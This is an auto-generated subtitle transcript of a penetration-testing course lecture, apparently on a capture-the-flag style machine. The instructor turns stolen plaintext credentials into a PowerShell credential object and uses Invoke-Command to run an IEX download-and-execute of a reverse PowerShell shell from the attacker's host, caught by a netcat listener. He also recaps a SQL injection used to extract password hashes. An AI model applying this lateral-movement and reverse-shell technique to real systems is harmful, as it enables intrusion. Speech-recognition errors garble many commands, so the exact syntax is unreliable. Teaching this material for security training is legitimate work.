1 00:00:00,390 --> 00:00:08,280 OK, so we've got access as the user account for the IRS, you can see these are the files inside of 2 00:00:08,280 --> 00:00:09,290 the local webapp. 3 00:00:09,660 --> 00:00:10,200 What can we do? 4 00:00:10,210 --> 00:00:13,110 We need to get Hektor. 5 00:00:15,460 --> 00:00:19,900 And we can see Hector is actually a member of this remote management users group. 6 00:00:21,340 --> 00:00:25,290 So the next thing we need to do is figure out what is this remote management user's group? 7 00:00:25,300 --> 00:00:27,640 We're going to do it up, Google. 8 00:00:27,640 --> 00:00:35,790 And let's see, it's a remote management user's power. 9 00:00:35,950 --> 00:00:40,140 So remote, he writes about your meeting is basically SSA for Windows. 10 00:00:41,050 --> 00:00:45,940 So this user may have the ability to move laterally to other accounts, which is a good thing to know. 11 00:00:47,530 --> 00:00:52,650 So let's just go back here and let's think about this. 12 00:00:53,500 --> 00:01:03,370 We want to gain access as this particular user and we actually have creds. 13 00:01:04,840 --> 00:01:08,650 If Hector's creds, we looks like Hector's Kretz right this right here. 14 00:01:09,190 --> 00:01:15,070 So we might be able to use these creds to log in as Hector. 15 00:01:15,850 --> 00:01:16,210 Right. 16 00:01:17,980 --> 00:01:18,330 All right. 17 00:01:18,340 --> 00:01:20,770 So how do we do that? 18 00:01:20,820 --> 00:01:25,740 Well, first, we probably should get power show installed on a local box. 19 00:01:26,950 --> 00:01:40,210 If you go to power, Shell, GitHub, actually partial Linux talk almanac's, you'll see this long post. 20 00:01:42,700 --> 00:01:47,990 And if you take this stuff right here, you just click copy it. 21 00:01:48,130 --> 00:01:49,210 A copy of the clipboard. 22 00:01:50,700 --> 00:01:51,640 Let's clear this. 23 00:01:53,680 --> 00:02:01,630 Toisa, torture the printer and it will try to install Power Shell and actually launch it. 24 00:02:04,220 --> 00:02:04,720 There we go. 25 00:02:05,480 --> 00:02:07,220 P.S. version table, 26 00:02:10,640 --> 00:02:13,100 we now have power show one our local box. 27 00:02:13,580 --> 00:02:14,240 Isn't that sweet? 28 00:02:14,930 --> 00:02:17,930 Yeah, a partial version seven is actually cross platform. 29 00:02:17,960 --> 00:02:20,020 It's not just a Windows tool anymore. 30 00:02:20,030 --> 00:02:20,760 I don't know if you knew that. 31 00:02:20,780 --> 00:02:21,680 A lot of people don't. 32 00:02:22,580 --> 00:02:23,300 But I would. 33 00:02:23,300 --> 00:02:28,400 Version six actually is when they moved over to the dot net core framework, which is different than 34 00:02:28,400 --> 00:02:35,300 dot net because dot net cars, cross platform and version seven is the latest iteration that has almost 35 00:02:35,300 --> 00:02:40,010 all the functionality of the previous versions and more more command, lots more modules, more everything 36 00:02:40,010 --> 00:02:40,640 more awesome. 37 00:02:41,120 --> 00:02:41,420 All right. 38 00:02:41,420 --> 00:02:42,190 So control lazy. 39 00:02:43,460 --> 00:02:44,240 What are we gonna do here? 40 00:02:44,480 --> 00:02:45,320 What we're going to play. 41 00:02:46,340 --> 00:02:46,640 All right. 42 00:02:46,650 --> 00:02:52,050 So how do we do this? 43 00:02:52,310 --> 00:02:53,510 Well, let's create some variables. 44 00:02:53,510 --> 00:02:57,410 First user name equals Hektor. 45 00:02:59,240 --> 00:03:00,710 User name gets. 46 00:03:00,710 --> 00:03:02,840 We have Hektor Sweet Password. 47 00:03:03,490 --> 00:03:04,280 What is the password? 48 00:03:04,430 --> 00:03:06,360 We need to convert the password to a secure string. 49 00:03:06,380 --> 00:03:08,870 So how do we do that of it is zero. 50 00:03:09,500 --> 00:03:09,980 That's zero. 51 00:03:09,980 --> 00:03:14,600 Where in Paracha get help and we can do like Shakya String. 52 00:03:16,820 --> 00:03:17,240 Yes. 53 00:03:17,240 --> 00:03:24,290 So we have a command team from shitkicker string and two chicken string we want to do to secure string. 54 00:03:24,440 --> 00:03:24,830 Right. 55 00:03:25,580 --> 00:03:29,630 Convert to secure string details. 56 00:03:30,560 --> 00:03:35,090 And I said tapped autocomplete that in fact if I backspace this out and I said tab here, trust me, 57 00:03:35,090 --> 00:03:45,740 all of the options I have and if I just did parameters like this and then I hit start, you know, just 58 00:03:45,740 --> 00:03:46,760 show me all the parameters. 59 00:03:48,350 --> 00:03:54,460 So now I know which parameters I need to pass to this tool to convert everything to a secure stream. 60 00:03:55,670 --> 00:03:55,930 Right. 61 00:03:55,940 --> 00:03:56,720 That's what this does. 62 00:03:56,900 --> 00:04:00,350 It's going to convert the clear text password into a secure string so we can use it. 63 00:04:01,670 --> 00:04:06,970 And we have it as plain text, which specifies a plain text trying to convert it to a chicken string. 64 00:04:06,980 --> 00:04:12,260 So we probably want that and then force, which confirms that you understand the implications of using 65 00:04:12,260 --> 00:04:13,070 the as plain text. 66 00:04:13,100 --> 00:04:13,480 All right. 67 00:04:14,000 --> 00:04:21,200 So let's just do this and let's go up. 68 00:04:22,610 --> 00:04:27,830 Oh, by the way, one of the things you should do is you should actually do update help. 69 00:04:29,210 --> 00:04:32,450 So you get the latest help files for backup. 70 00:04:33,110 --> 00:04:37,640 And if you don't do this, you'll actually have incomplete help files and would be very difficult and 71 00:04:37,640 --> 00:04:39,740 frustrating when you're trying to figure out what's happening. 72 00:04:41,270 --> 00:04:49,280 So control a bracket in terms of what this does here, convert encrypted static strings and strings. 73 00:04:49,430 --> 00:04:52,790 It can also convert plaintext strings to shake your strings. 74 00:04:52,910 --> 00:04:53,230 Right. 75 00:04:54,080 --> 00:04:55,470 So that is precisely what we want to do. 76 00:04:56,900 --> 00:04:59,180 So let's go back to where we were before 77 00:05:02,270 --> 00:05:03,650 and we want to use as plain text. 78 00:05:03,650 --> 00:05:03,920 Right. 79 00:05:06,450 --> 00:05:18,780 So let's go over here and let's type let's say password equals convert to secure string and put the 80 00:05:18,780 --> 00:05:19,350 string in there. 81 00:05:20,520 --> 00:05:25,680 So control and shift the, quote, cat creds. 82 00:05:26,610 --> 00:05:27,830 Cat Kretz. 83 00:05:28,860 --> 00:05:30,240 Let's grab this password here. 84 00:05:34,160 --> 00:05:43,480 Control shifts, sea control should be put that in single quotes, control, shift, a coat of paint, 85 00:05:45,180 --> 00:05:54,510 hold down control right out to go to the end and tell me what to do as plain text and force no error 86 00:05:54,510 --> 00:05:54,900 messages. 87 00:05:54,900 --> 00:06:00,630 So with your password, we've got that nice and probably also going to do the hostname. 88 00:06:00,630 --> 00:06:01,710 So we'll save the hostname 89 00:06:04,260 --> 00:06:07,320 as a variable fidelity. 90 00:06:09,900 --> 00:06:10,110 All right. 91 00:06:10,110 --> 00:06:11,300 So now we've got a secure street. 92 00:06:12,180 --> 00:06:18,270 Let's go ahead and build our credential objects so we can make use of the string and execute commands 93 00:06:18,270 --> 00:06:19,890 as Hector on this local box. 94 00:06:20,760 --> 00:06:23,030 So I ask you to get out of here and let's. 95 00:06:23,070 --> 00:06:28,590 Do you get help actually get help. 96 00:06:29,750 --> 00:06:32,850 P.S. Get let's see. 97 00:06:33,930 --> 00:06:40,200 This is the credential and you can see there's a get credential command. 98 00:06:40,340 --> 00:06:48,630 So if I do get help, get a credential parameter star. 99 00:06:53,800 --> 00:06:59,440 You can see it belongs to this class system, the automation system, that management automation has 100 00:06:59,440 --> 00:07:03,670 put a job that's called new object and will name it 101 00:07:08,440 --> 00:07:20,500 credential was a new object system, dot management, dot automation, dot press credentials. 102 00:07:21,940 --> 00:07:25,600 And what we're going to do is we're going to put username and password. 103 00:07:29,380 --> 00:07:35,290 That's because I put an S there should just be a credential, a nice credential. 104 00:07:36,430 --> 00:07:37,870 And we say we've got this object. 105 00:07:38,320 --> 00:07:41,860 Now, the last thing we need to do is invoked the invoke the command on the local box. 106 00:07:42,400 --> 00:07:44,080 So again, get help. 107 00:07:45,220 --> 00:07:47,530 Invoke command. 108 00:07:54,080 --> 00:07:57,620 That did a little bit too much, let's just do your vocal command. 109 00:07:58,700 --> 00:07:59,150 Yes. 110 00:08:00,950 --> 00:08:07,610 So what this does is it will run a command, run the command that a local or remote computer and returns 111 00:08:07,610 --> 00:08:08,750 all output from those commands. 112 00:08:09,410 --> 00:08:14,750 So we're going to actually run in full command from the perspective of the victim machine, and therefore 113 00:08:14,750 --> 00:08:20,750 it will return the results on the local machine, the vector machine, to ask the attacker, OK, that 114 00:08:20,750 --> 00:08:21,260 makes sense. 115 00:08:23,210 --> 00:08:24,680 Parameter star. 116 00:08:25,340 --> 00:08:27,380 Let's see what parameters we have here. 117 00:08:30,500 --> 00:08:31,160 We've got a lot. 118 00:08:32,220 --> 00:08:33,050 We really need a few. 119 00:08:35,190 --> 00:08:42,250 So allow redirections milpa application name argument list. 120 00:08:42,270 --> 00:08:43,500 No, no, no. 121 00:08:46,710 --> 00:08:47,700 OK, computer name. 122 00:08:48,100 --> 00:08:55,770 Let's put that in there so we can say invoke command, computer name is hostname. 123 00:08:57,150 --> 00:08:58,070 Get that from here. 124 00:08:59,700 --> 00:09:00,030 Right. 125 00:09:01,830 --> 00:09:03,340 Let's put this parameter in. 126 00:09:05,130 --> 00:09:06,000 What else do we need? 127 00:09:07,240 --> 00:09:09,510 A page down. 128 00:09:13,640 --> 00:09:17,330 Credential specifies a user account that has permission to perform this action. 129 00:09:17,990 --> 00:09:19,250 The default is the current user. 130 00:09:20,360 --> 00:09:29,270 So let's go ahead and put this in credential credential, credential the variable forever that holds 131 00:09:29,270 --> 00:09:36,800 our credential object and then script block and specifies the command to run and close the command, 132 00:09:36,800 --> 00:09:37,580 the curly braces. 133 00:09:38,300 --> 00:09:38,560 All right. 134 00:09:38,570 --> 00:09:44,510 This is exactly what we want because we descript block. 135 00:09:45,320 --> 00:09:49,070 Yes, we can now put a command in here and we're commanded that. 136 00:09:49,070 --> 00:09:49,780 We want to put it here. 137 00:09:51,200 --> 00:09:53,000 Well, what about a command Hektor? 138 00:09:53,090 --> 00:09:57,050 What command do you think we would want to run as an attacker, as Hektor? 139 00:09:58,550 --> 00:09:59,510 Think about this for a second. 140 00:10:00,620 --> 00:10:01,400 We want to get in your shell. 141 00:10:01,400 --> 00:10:01,720 Right. 142 00:10:02,120 --> 00:10:11,030 So if we were the effects of a Web request to a two point four, four, three, again, we will download 143 00:10:11,450 --> 00:10:18,080 our show, but we'll download it in the security context of this credentialed user, which is Hektor, 144 00:10:18,080 --> 00:10:19,710 which means we should have a show as Hector. 145 00:10:20,210 --> 00:10:20,890 All right, let's try it. 146 00:10:21,740 --> 00:10:30,300 So we'll say IEX, I invoke recall, invoke expression and then request 14 10 147 00:10:33,250 --> 00:10:34,330 volt power. 148 00:10:34,490 --> 00:10:38,030 Shall TCP use basic parsing? 149 00:10:39,410 --> 00:10:44,960 And before we do that, we need to make sure that we're listening on board for four three, because 150 00:10:44,960 --> 00:10:47,850 remember, this is going to try to connect back and forth for three. 151 00:10:47,870 --> 00:10:52,460 So control a shift robocalling zero hour wrap. 152 00:10:53,570 --> 00:11:01,540 And by the way, the reason I'm using oil wrap, if you do are is a tool that gives us the UpDown functionality. 153 00:11:01,550 --> 00:11:05,150 So if you throw at cash or I'll wrap. 154 00:11:10,060 --> 00:11:13,270 Zero at search, I'll wrap. 155 00:11:17,190 --> 00:11:22,260 See, borderline feature come in line rapper, this means when we get our show back in the witness box, 156 00:11:22,260 --> 00:11:23,580 we'll have the up down arrows. 157 00:11:23,590 --> 00:11:27,110 If we don't pass that Katara wrap will lose that. 158 00:11:27,110 --> 00:11:33,060 And it gets really frustrating when you try to navigate on the box so we don't throw our whole rap in 159 00:11:33,060 --> 00:11:33,450 that cat. 160 00:11:34,830 --> 00:11:36,450 No, don't resolve those names. 161 00:11:36,450 --> 00:11:37,110 Make it verbose. 162 00:11:37,110 --> 00:11:38,660 Listen to import 443. 163 00:11:39,570 --> 00:11:39,900 All right. 164 00:11:40,830 --> 00:11:42,300 And then let's do it because it works. 165 00:11:44,570 --> 00:11:44,880 All right. 166 00:11:44,890 --> 00:11:47,130 It looks like we forgot that. 167 00:11:47,310 --> 00:11:48,800 It actually tells you exactly what we forgot. 168 00:11:48,810 --> 00:11:52,050 Missing closing parentheses right at the opening parentheses here. 169 00:11:52,560 --> 00:11:53,730 We missed the closing one here. 170 00:11:54,330 --> 00:11:56,370 So let's just put it in. 171 00:12:02,280 --> 00:12:02,570 Sweet. 172 00:12:03,420 --> 00:12:07,430 You know, Hector, as you can see from Hector here and from here. 173 00:12:08,400 --> 00:12:13,110 So now that we are Hector, we need to find a way to move vertically. 174 00:12:13,110 --> 00:12:21,900 So we did horizontal escalation, proposed escalation, and we're going to move into the vertical escalation. 175 00:12:21,940 --> 00:12:23,680 Remember how we did the horizontal escalation? 176 00:12:23,700 --> 00:12:27,000 We found clear text credentials inside the database. 177 00:12:28,200 --> 00:12:33,090 Of course, the conditions for there were they were hashed, but we were able to obtain those credentials 178 00:12:33,870 --> 00:12:40,610 by exploiting a publicly facing Web application, which is this Fidelity application. 179 00:12:40,920 --> 00:12:45,870 There was a single injection inside of one of the parameters, actually multiple parameters, but in 180 00:12:45,870 --> 00:12:48,570 this case, inside their search, their catalog database. 181 00:12:49,050 --> 00:12:55,190 And we were able to exfil the MySQL, that user's table, which contained those hashes and of the hashes. 182 00:12:55,200 --> 00:12:56,760 It might make it a little bit difficult to crack. 183 00:12:56,760 --> 00:12:57,690 They they salted either. 184 00:12:57,690 --> 00:13:01,080 So I just want to get you up to speed on what we did and what we're doing. 185 00:13:01,230 --> 00:13:04,110 And this is typically what you would do when you're typing up a report for a pen test. 186 00:13:04,830 --> 00:13:05,220 All right. 187 00:13:05,230 --> 00:13:12,570 So in the next lecture, we are going to escalate from Hector to a system that was either.